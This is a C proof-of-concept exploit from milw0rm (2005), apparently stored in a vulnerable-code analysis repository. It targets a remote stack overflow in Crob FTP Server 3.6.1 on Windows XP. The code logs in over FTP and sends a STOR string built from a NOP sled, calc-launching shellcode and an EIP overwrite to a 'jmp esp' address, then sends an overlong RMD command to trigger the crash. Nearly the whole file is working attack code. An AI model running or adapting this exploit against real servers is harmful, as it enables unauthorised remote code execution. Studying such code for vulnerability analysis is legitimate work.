lilbool/vuln-code-analysis
0
1/*
2 * CrobFTP remote stack overflow PoC
3 * ---------------------------------
4 * Tested on Crob FTP Server 3.6.1, Windows XP
5 *
6 * Coded by Leon Juranic <ljuranic@lss.hr>
7 * LSS Security / http://security.lss.hr
8 *
9 */
10
11
12
13#include <stdio.h>
14#include <windows.h>
15#include <time.h>
16
17#pragma comment (lib,"ws2_32")
18
19
20char *fzz_recv (int sock)
21{
22 fd_set fds;
23 struct timeval tv;
24 static char buf[10000];
25 char *ptr=buf;
26 int n;
27 tv.tv_sec = 5;
28 tv.tv_usec = 0;
29
30 FD_ZERO(&fds);
31 FD_SET(sock,&fds);
32 if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
33 if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
34 buf[n-1] = '\0';
35 printf ("RECV: %s\n",buf);
36 return buf;
37 }
38 else {
39 return NULL;
40 }
41
42}
43
44
45
46
47int login (int sock, char *user, char *pass)
48{
49 char buf[1024], *bla;
50 bla=fzz_recv(sock);
51 printf ("recv: %s\n",bla);
52 sprintf (buf,"USER %s\r\n",user);
53 send (sock,buf,strlen(buf),0);
54 bla=fzz_recv(sock);
55 printf ("recv: %s\n",bla);
56 sprintf (buf,"PASS %s\r\n",pass);
57 send (sock,buf,strlen(buf),0);
58 bla=fzz_recv(sock);
59 printf ("recv: %s\n",bla);
60 if (strcmp("230",bla) != NULL)
61 return 0;
62 else return -1;
63 return 0;
64}
65
66
67
68
69void lame_sploit (char *pack, char *user, char *pass)
70{
71 WORD wVersionRequested;
72 WSADATA wsaData;
73 int sock, err,x;
74 struct sockaddr_in sin;
75 char buf[2000],tmp[1000];
76
77
78 char *shell= // 5 min. XP SP1 shellcode
79 "\x33\xc0" // xor eax,eax
80 "\x50" // push eax (\0)
81 "\x68\x2e\x65\x78\x65" // push '.exe'
82 "\x68\x63\x61\x6c\x63" // push 'calc'
83 "\x54" // push esp
84 "\xba\x44\x80\xc2\x77" // mov edx, 77c28044
85 "\xff\xd2"; // call edx (system)
86
87
88 wVersionRequested = MAKEWORD( 2, 2 );
89 err = WSAStartup( wVersionRequested, &wsaData );
90 if ( err != 0 ) {
91 printf ("ERROR: Sorry, cannot create socket!!!\n");
92 ExitProcess(-1);
93 }
94
95 sock=socket(AF_INET,SOCK_STREAM,0);
96
97
98 sin.sin_family=AF_INET;
99 sin.sin_addr.s_addr = inet_addr(pack);
100 sin.sin_port = htons(21);
101
102 if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
103 printf ("CONNECT :(((\n");
104 ExitProcess(-1);
105 }
106
107 if (login(sock,user,pass) == -1)
108 {
109 printf ("ERROR: Cannot login to FTP server, sorry!!!\n");
110 exit(-1);
111 }
112
113 memset(tmp,0,sizeof(tmp));
114 memset (tmp,0x90,180);
115
116
117 memcpy (&tmp[80],shell,strlen(shell));
118 *(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
119 *(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74
120 *(long*)&tmp[170] = 0x9090e4ff; // jmp esp
121
122
123 _snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);
124
125 printf ("DEBUG: %.30s %d\n",buf,strlen(buf));
126 send (sock,buf,strlen(buf),0);
127 printf ("%s\n",fzz_recv(sock));
128
129 strcpy(buf,"RMD ");
130 for (x=0;x<276;x++)
131 strcat (buf,".../");
132 strcat(buf,"\r\n");
133
134 printf ("Sending exploit strings\n");
135 send (sock,buf,strlen(buf),0);
136 printf ("recv: %s\n",fzz_recv(sock));
137
138
139}
140
141
142
143main (int argc, char **argv)
144{
145 printf ("CrobFTP Stack overflow PoC \n"
146 "Coded by Leon Juranic <ljuranic@lss.hr>\n"
147 "LSS Security / http://security.lss.hr/\n");
148
149 if (argc < 4 ) {
150 printf ("\nusage: %s <target_IP> <user> <pass>\n",argv[0]);
151 exit(-1);
152 }
153 lame_sploit(argv[1],argv[2],argv[3]);
154
155}
156
157// milw0rm.com [2005-06-03]